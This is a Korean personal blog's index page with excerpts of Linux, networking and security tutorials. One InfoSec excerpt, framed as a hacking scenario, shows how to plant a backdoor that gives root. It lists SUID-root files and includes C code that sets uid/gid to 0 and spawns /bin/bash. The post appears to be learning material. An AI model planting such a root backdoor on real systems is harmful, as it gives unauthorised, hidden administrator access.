jtk7 님의 블로그

SSH를 이용하여 파일 전송/수신하기

업로드scp 파일명 [유저명]@[상대주소]:[복사할폴더] 다운로드scp 서버주소:파일명 ./# ./ 은 현재 폴더를 의미합니다.

2024. 6. 28. 14:00

리눅스 유저 로그인을 금지시키는 8가지 방법

로그인 정책로컬로그인원격 접속루트에서전환1/etc/passwd 파일의 계정명 앞에 *표시로 주석처리차단차단불가2passwd -l 명령으로 로그인을 금지차단차단허용3/etc/passwd 파일의 로그인쉘을 /bin/false로 설정차단차단불가4/etc/passwd 파일의 로그인쉘을 /bin/nologin으로 설정차단차단불가5usermod -L 명령으로 로그인을 금지차단차단허용6chage 명령으로 사용자의 패스워드를 만료시키기차단차단허용7PAM을 이용한 로그인 금지차단허용허용8/etc/shadow 파일의 두번째 필드 앞에 !!를 표시하기차단차단허용 1. /etc/passwd 파일의 계정명 앞에 *표시로 주석처리gedit /etc/passwd 로컬 로그인 : 불가능 원격 접속 : 차단 2. passw..

2024. 6. 28. 11:49

Linux

Linux 기초 및 명령어들

Single Quotes (' ') : 모든 특수 문자의 의미를 제거합니다. echo '$HOSTNAME'$HOSTNAME Double Quotes (" "): 대부분의 특수 문자를 보호합니다. 띄어쓰기 등으로 명령어를 하나로 인식시켜주어야 할 때 사용합니다. echo "$HOSTNAME" R92-00 Back Quotes (` `): 묶여진 문자열을 명령어로 인식합니다. 문자와 명령어를 혼용할 때 사용합니다.echo "current directory is `pwd`"current directory is /home/user1 Backslash (\): 한 단어 문자로 인식합니다.echo \$PATH$PATHbin 유저들이 사용 가능한 명령어 파일들이 들어 있다. sbin 관리자만 사용 가능한 명령어 ..

2024. 6. 28. 09:45

InfoSec

리눅스 백도어 루트 로그인 파일 만들기

C언어 컴파일러 설치하기dnf install -y gcc 현재 상황유저가 관리자 암호를 우연히 알게 되었다.이 유저는 관리자 권한으로 백도어 파일을 생성한 후차후에 관리자 권한을 이용하여 시스템을 해킹하고자 한다. 특정 파일을 실행하면 현재 계정을 루트로 변경시키기(관리자로 로그인한 상태에서)cd /home/유저명find / -user root -perm -4000 > root_perm.txt# 유저명이 root이며 권한이 4000으로 되어있는 파일을 찾아# root_perm.txt 파일에 목록을 저장합니다.gedit backdoor.c #include main(){ setuid(0); setgid(0); system("/bin/bash");} # 현재 사용자의 uid와 gid를 0(r..

2024. 6. 27. 17:52

InfoSec

리눅스 사용자 로그인 기록 추적하기

1. 로그 저장 디렉터리 생성/backup/user_command mkdir -p /backup/user_commandtree /backup 2. 로그 파일에 퍼미션(권한 부여)숫자 777첫번째 숫자 => 파일이나 폴더의 소유자를 의미두번째 숫자 => 파일이나 폴더의 그룹을 의미세번째 숫자 => 소유자 & 그룹이 아닌 계정 권한을 변경하는 명령어 : chmod (Change Modify)chmod 777 /backup/user_command/ 3. 로그 자동추적 구문 작성gedit /etc/profile 마지막 라인에 구문 추가 작성# User Monitoring USER=`who am i | awk '{print $1}'` TTY=`tty` if [ -n $TTY ] ; then WH..

2024. 6. 27. 17:03

Network

Static Routing

라우터: 목적지로 가는 최적의 경로를 설정 -> 라우팅 테이블 등록 -> 라우터는 출발지 주소와는 상관없이 목적지 주소로만 동작합니다. Static RoutingStatic Routing은 관리자가 직접 Routing 정보를 입력해주는 Routing 방식으로네트워크를 전부 수동으로 입력해 주어야 합니다.그러므로 소규모 네트워크에 적합하고 관리가 용이하며 보안이 뛰어납니다. R1)conf tint f0/0ip add 172.16.1.254 255.255.255.0no sh int s1/0ip add 172.16.12.1 255.255.255.0no sh int s1/1ip add 172.16.13.1 255.255.255.0no sh int s1/2ip add 172..

2024. 6. 27. 14:35